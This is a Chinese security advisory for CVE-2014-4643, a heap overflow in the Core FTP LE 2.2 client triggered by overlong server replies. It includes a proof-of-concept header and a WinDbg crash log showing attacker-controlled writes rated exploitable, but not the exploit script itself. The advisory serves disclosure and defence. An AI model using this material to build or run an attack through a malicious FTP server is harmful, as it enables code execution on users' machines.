Core FTP LE响应处理缓冲区溢出漏洞

发布日期：2014-06-25
更新日期：2014-06-26

受影响系统：
Core FTP Core FTP LE/PRO 2.2 build 1798
描述：
--------------------------------------------------------------------------------
CVE(CAN) ID: CVE-2014-4643
 
CoreFTP是免费的FTP客户端。
 
CoreFTP LE 2.2 build 1798版本处理PASV命令的响应时，coreftp.exe存在边界错误，恶意用户通过特制命令响应，利用此漏洞可造成堆缓冲区溢出，成功利用后可执行任意代码，但需要诱使用户连接到恶意服务器。
 
<*来源：Gabor Seljan
 
  链接：
       
 *>

测试方法：
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！
Gabor Seljan （）提供了如下测试方法：
 
#-----------------------------------------------------------------------------#
 # Exploit Title: Core FTP LE 2.2 - Heap Overflow PoC                          #
 # Date: Jun 11 2014                                                          #
 # Exploit Author: Gabor Seljan                                                #
 # Software Link:                                       #
 # Version: 2.2 build 1798                                                    #
 # Tested on: Windows XP SP3                                                  #
 #-----------------------------------------------------------------------------#

# In some cases the client does not do proper bounds checking on server
 # responses. An overly long reply from the server causes a heap overflow and
 # crashes the application. The USER, PASS, PASV, SYST, PWD, CDUP commands are
 # all vulnerable and possibly other commands are too.

'''
 HEAP[coreftp.exe]: Heap block at 00F17BC8 modified at 00F1BBD1 past requested size of 4001
 (9d8.9f4): Break instruction exception - code 80000003 (first chance)
 eax=00f17bc8 ebx=00f1bbd1 ecx=7c91eab5 edx=015295ab esi=00f17bc8 edi=00004001
 eip=7c90120e esp=015297ac ebp=015297b0 iopl=0        nv up ei pl nz na po nc
 cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000            efl=00000202
 ntdll!DbgBreakPoint:
 7c90120e cc              int    3
 0:002> dd eax
 00f17bc8  004b0804 011f0733 20373232 41414141
 00f17bd8  41414141 41414141 41414141 41414141
 00f17be8  41414141 41414141 41414141 41414141
 00f17bf8  41414141 41414141 41414141 41414141
 00f17c08  41414141 41414141 41414141 41414141
 00f17c18  41414141 41414141 41414141 41414141
 00f17c28  41414141 41414141 41414141 41414141
 00f17c38  41414141 41414141 41414141 41414141
 0:002> g
 HEAP[coreftp.exe]: Invalid Address specified to RtlFreeHeap( 00C10000, 00F17BD0 )
 (9d8.9f4): Break instruction exception - code 80000003 (first chance)
 eax=00f17bc8 ebx=00f17bc8 ecx=7c91eab5 edx=015295ba esi=00c10000 edi=00f17bc8
 eip=7c90120e esp=015297c4 ebp=015297c8 iopl=0        nv up ei pl nz na po nc
 cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000            efl=00000202
 ntdll!DbgBreakPoint:
 7c90120e cc              int    3
 0:002> g
 (9d8.9f4): Access violation - code c0000005 (first chance)
 First chance exceptions are reported before any exception handling.
 This exception may be expected and handled.
 eax=00f3bff0 ebx=00000000 ecx=41414141 edx=00f1bbf0 esi=00f3bfe8 edi=00c10000
 eip=7c9276dc esp=01529704 ebp=015297d8 iopl=0        nv up ei pl zr na pe nc
 cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000            efl=00010246
 ntdll!RtlOemStringToUnicodeString+0x277:
 7c9276dc 8901            mov    dword ptr [ecx],eax  ds:0023:41414141=????????
 0:002> !exploitable
 Exploitability Classification: EXPLOITABLE
 Recommended Bug Title: Exploitable - User Mode Write AV starting at ntdll!RtlOemStringToUnicodeString+0x0000000000000277 (Hash=0x72683756.0x417d7f55)